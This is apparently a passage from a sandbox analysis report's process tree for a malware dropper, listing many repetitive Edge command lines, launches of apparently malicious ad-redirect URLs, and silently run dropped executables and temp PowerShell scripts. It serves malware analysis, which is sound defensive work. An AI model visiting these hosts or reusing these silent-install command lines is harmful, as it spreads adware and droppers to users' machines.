C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7092 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7568 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4088 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2348 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7724 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7856 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2156 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7556 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8740 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8416 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8324 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8760 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7872 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8732 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8484 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8864 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9276 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9868 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"7⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad6⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514836⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515136⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872156⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631196⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942316⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xa0,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=13396806⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=36⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Users\Admin\AppData\Local\Temp\41-d7994-2cf-eb2b7-baca0dabd8f6c\Jywynoxysy.exe"C:\Users\Admin\AppData\Local\Temp\41-d7994-2cf-eb2b7-baca0dabd8f6c\Jywynoxysy.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o5creuck.fr2\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\o5creuck.fr2\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\o5creuck.fr2\GcleanerEU.exe /eufive7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2464 -s 2488⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4u3xpdmc.qfj\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\4u3xpdmc.qfj\installer.exeC:\Users\Admin\AppData\Local\Temp\4u3xpdmc.qfj\installer.exe /qn CAMPAIGN="654"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\revwwbc0.mkz\any.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\revwwbc0.mkz\any.exeC:\Users\Admin\AppData\Local\Temp\revwwbc0.mkz\any.exe7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp2vmnyv.f0h\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\qp2vmnyv.f0h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\qp2vmnyv.f0h\gcleaner.exe /mixfive7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 2528⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fi2sxdp4.efj\autosubplayer.exe /S & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\fi2sxdp4.efj\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\fi2sxdp4.efj\autosubplayer.exe /S7⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseB218.tmp\tempfile.ps1"8⤵
-
